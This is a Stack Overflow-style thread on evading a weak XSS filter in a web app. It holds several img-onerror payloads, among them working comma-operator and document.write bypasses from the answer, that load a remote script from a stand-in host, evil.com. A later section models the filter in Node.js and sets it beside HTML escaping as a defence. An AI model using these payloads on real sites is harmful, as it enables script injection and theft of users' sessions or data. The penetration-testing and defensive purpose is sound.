
I have found a web app that is vulnerable to XSS, and can get some javascript running using an img tag, however the method I am using destroys the rest of the page, as they are using some filters to attempt to stop it.

The filters I have detected so far are as follows:

  • </anythingyouwant> gets replaced with nothing
  • /> gets replaced with nothing
  • ; gets replaced with a space until the next >
  • 135 character limit including method of delivery, e.g. <img src="." onerror="alert('xss')">

Injecting <img src="." onerror="alert('xss')"> works fine, however these developers are rather sceptical and wish to see a full PoC of full javascript code. Is it possible to run an arbitrary script at all?

I have tried:

  • <img src="." onerror="eval(atob('Yj1kb2N1bWVudDthPWIuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7YS5zcmM9Jy8vZXZpbC5jb20vbXlzY3JpcHQnO2IuYm9keS5hcHBlbmRDaGlsZChhKQ=='))"> result: too long, even with a shortened URL
  • <script src="//evil.com/myscript" /> result: can't close script tags like that, and it gets filtered, and it destroys the rest of the page by web app omitting 'closing' tag
  • <script src=//evil.com/myscript"></script> result: gets filtered, destroys rest of page as above
  • <img src="." onerror="b=document;a=b.createElement('script');a.src='//evil.com/myscript';b.body.appendChild(a)"> result: semicolons get filtered, breaks web page
  • <img src="." onerror="b=document a=b.createElement('script') a.src='//evil.com/myscript' b.body.appendChild(a)"> result: I'm unsure if this is valid js, but it appears in the chrome view page source as intended, but does not work as wanted

I am using chrome for testing, just in case it's relevant somehow.

frosty1
  • 13
  • 2
  • Use commas instead of semicolons. – Bergi Sep 29 '18 at 15:07
  • "*destroys rest of page*" - how is that a problem? As long as your code runs, you can do anything you like, including an attempt at restoring the rest of the page so that the user doesn't notice. – Bergi Sep 29 '18 at 15:08
  • @Bergi the original page is a mess and is dynamic, by "destroyed" I mean the rest of the page gets removed completely, and it would be too much code to recreate quickly. – frosty1 Sep 29 '18 at 16:43

1 Answer

1

The security measures you listed are definitely insufficient. Two examples I could imagine to work for you:

<img src="." onerror="document.write('<script src=\'//evil.com/myscript\'><'+'/'+'script>')">

or your version with a , instead of a ;:

<img src="." onerror="b=document, a=b.createElement('script'), a.src='//evil.com/myscript', b.body.appendChild(a)">

But I am absolutely certain there are many other ways to do that. You could also check the following cheat sheet which I found in this answer.

likle
  • 1,717
  • 8
  • 10
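As an added illustration (not code from the question or the answer above), here is a small Node.js model of the blacklist filter the question describes, placed beside a contextual HTML-escaping function. The filter rules are an assumption reconstructed from the bullet list in the question; the real application's code is not known. The point for a defender is that a character-mangling blacklist leaves the tag and its event handler intact, so any JavaScript syntax that avoids the blocked characters (the comma operator in the answer) still executes, while encoding untrusted data at output time neutralises the injection regardless of which syntax is used.

```javascript
// Added example: a reconstruction of the filter described in the question
// (assumed behaviour, not the application's own code) next to proper
// output encoding, to show why the blacklist is insufficient.

// Reconstructed blacklist: strips closing tags and "/>", and turns ";" into
// a space whenever a ">" follows later in the input.
function blacklistFilter(input) {
  let out = input.replace(/<\/[^>]*>/g, ""); // </anything> -> ""
  out = out.replace(/\/>/g, "");             // "/>" -> ""
  out = out.replace(/;(?=[^>]*>)/g, " ");    // ";" -> " " until the next ">"
  return out;
}

// Contextual escaping for the "text inside an HTML element" context: every
// character that can open markup or terminate an attribute is encoded, so
// the browser never sees a tag, whatever the JavaScript inside it looks like.
function htmlEscape(input) {
  const map = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
  };
  return input.replace(/[&<>"']/g, (c) => map[c]);
}

// Detection heuristic for the comparison below: is there still an element
// carrying an on* event-handler attribute after the defence has run?
function containsEventHandlerTag(html) {
  return /<[a-z][^>]*\son\w+\s*=/i.test(html);
}

// Constructed sample inputs mirroring the two payload shapes in the thread
// (the host name is a placeholder, not a real script location).
const semicolonPayload =
  "<img src=\".\" onerror=\"b=document;a=b.createElement('script');" +
  "a.src='//example.invalid/x';b.body.appendChild(a)\">";
const commaPayload =
  "<img src=\".\" onerror=\"b=document, a=b.createElement('script'), " +
  "a.src='//example.invalid/x', b.body.appendChild(a)\">";

// Runs both defences over both inputs and reports whether an executable
// handler survives each one.
function compareDefenses() {
  return {
    blacklistSemicolon: containsEventHandlerTag(blacklistFilter(semicolonPayload)),
    blacklistComma: containsEventHandlerTag(blacklistFilter(commaPayload)),
    escapeSemicolon: containsEventHandlerTag(htmlEscape(semicolonPayload)),
    escapeComma: containsEventHandlerTag(htmlEscape(commaPayload)),
  };
}

console.log(compareDefenses());
```

Running the block shows the blacklist leaving an `onerror` handler in place for both inputs (the semicolon version is merely broken JavaScript, the comma version is untouched), whereas the escaped output contains no tag at all. The filter's mangling also explains the "destroys the rest of the page" symptom in the question: it rewrites markup instead of refusing or encoding it.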